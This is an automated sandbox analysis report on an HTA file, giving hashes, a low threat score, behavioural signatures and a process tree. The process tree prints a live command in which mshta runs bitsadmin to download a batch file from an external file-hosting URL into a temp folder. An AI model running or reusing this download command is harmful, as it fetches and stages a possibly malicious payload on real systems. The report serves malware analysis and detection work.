Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
03-08-2023 07:50
Static task
static1
Behavioral task
behavioral1
Sample
akuy4l.hta
Resource
win7-20230712-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
akuy4l.hta
Resource
win10v2004-20230703-en
windows10-2004-x64
11 signatures
150 seconds
General
-
Target
akuy4l.hta
-
Size
896B
-
MD5
ce90f45a4b8b1293cfb92f591c717d51
-
SHA1
5336b02e6b573891fb4bd2898849c3a94a77dc51
-
SHA256
b08756158b8b618cdf9defc7134737b1d0da931210b583643a7a0af3e927b9c4
-
SHA512
d553d0a177ea68d11a7aab548d7613e356cb9875b8e2995aee1ba62d8317e0d8de872c40095f4c5e1ac4154f8388e0829717993e51228cd0fccfa6f2bb132f79
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 2508 bitsadmin.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2204 wrote to memory of 2508 2204 mshta.exe 28 PID 2204 wrote to memory of 2508 2204 mshta.exe 28 PID 2204 wrote to memory of 2508 2204 mshta.exe 28 PID 2204 wrote to memory of 2508 2204 mshta.exe 28
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\akuy4l.hta"1⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://files.catbox.moe/enuvvy.bat C:\Users\Admin\AppData\Local\Temp\c.bat2⤵
- Download via BitsAdmin
PID:2508
-